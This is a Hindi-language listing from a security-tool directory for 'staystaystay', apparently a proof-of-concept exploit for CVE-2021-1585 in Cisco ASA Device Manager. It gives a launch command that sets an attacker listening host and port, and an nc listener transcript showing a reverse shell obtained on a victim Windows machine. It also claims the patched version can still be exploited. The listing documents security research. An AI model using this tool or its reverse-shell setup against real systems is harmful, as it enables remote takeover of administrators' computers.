Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
staystaystay — CVE-2021-1585 के लिए प्रमाण अवधारणा: Cisco ASA Device Manager RCE | Kitploit
उपकरण/GitHubGitHub/jbaines-r7/staystaystay
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubjbaines-r7/staystaystay

staystaystay

CVE-2021-1585 के लिए प्रमाण अवधारणा: Cisco ASA Device Manager RCE

रिपॉजिटरी देखें
134184 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

staystaystay

staystaystay CVE-2021-1585 के लिए एक प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट है, जो Cisco ASA डिवाइस मैनेजर (ASDM) को प्रभावित करने वाला एक मैन इन द मिडिल या ईविल एंडपॉइंट RCE मुद्दा है। यह मुद्दा मूल रूप से Malcolm Lashley द्वारा खोजा गया था और 2021 की गर्मियों में प्रकट किया गया था। हालाँकि, जिस समय मैं इस पर देख रहा था, यह नवीनतम संस्करण (ASDM 7.17(1)) में अनपैच था, मैं स्वतंत्र रूप से इस पर ठोकर खाई।

Cisco ने ASDM 7.18(1.152) में इसे "ठीक" किया। मैं "ठीक" कहता हूँ क्योंकि यह एक्सप्लॉइट अभी भी ठीक काम करता है। उपयोगकर्ता को केवल "हाँ" पर क्लिक करना होगा। नीचे एक वीडियो देखें।

हमलावर पीड़ित के लिए रिवर्स शेल प्राप्त करने के लिए दो प्रकार के पेलोड कॉन्फ़िगर कर सकते हैं:

  • jjs.exe आधारित (एक फ़ाइल डिस्क को छूती है - और हाल ही में इसे Windows Defender द्वारा पकड़ा गया है)
  • Longtime Sunshine आधारित

यदि कोई पीड़ित अपने ASDM को staystaystay से कनेक्ट करता है तो यह कॉन्फ़िगर किए गए पेलोड को इंजेक्ट करेगा जिसके परिणामस्वरूप एक रिवर्स शेल होगा। jjs रिवर्स शेल को एक सामान्य nc लिसनर (या यदि आप चाहें तो Metasploit) से पकड़ा जा सकता है। Longtime Sunshine विकल्प के लिए आवश्यक है कि हमलावर उस फ्रेमवर्क का उपयोग करे।

उदाहरण के तौर पर, निम्न कमांड jjs पेलोड के साथ पोर्ट 8443 पर staystaystay शुरू करेगा:

./staystaystay -j --lhost 10.0.0.2 --lport 1270 --https_port 8443

एक बार पीड़ित 8443 से कनेक्ट होता है, तो 10.0.0.2:1270 पर एक रिवर्स शेल उत्पन्न होगा:

albinolobster@ubuntu:~$ nc -lvnp 1270
Listening on 0.0.0.0 1270
Connection received on 10.0.0.26 50283
Microsoft Windows [Version 10.0.19042.1645]
(c) Microsoft Corporation. All rights reserved.

C:\Program Files (x86)\Cisco Systems\ASDM>whoami
whoami
desktop-1hug9pt\albinolobster

C:\Program Files (x86)\Cisco Systems\ASDM>

निम्नलिखित वीडियो में Longtime Sunshine के साथ शोषण का एक उदाहरण है:

  • https://www.youtube.com/watch?v=07VO2JGTWR8

निम्नलिखित वीडियो एक पैच किए गए संस्करण के खिलाफ हमले को प्रदर्शित करता है:

  • https://www.youtube.com/watch?v=ySgbHClk9HE

एक AttackerKB लेख यहाँ पाया जा सकता है:

  • https://attackerkb.com/topics/0vIso8fLhQ/cve-2021-1585/rapid7-analysis

श्रेय

  • Taylor Swift - ध्वनिक संस्करण
टूल डाउनलोड करें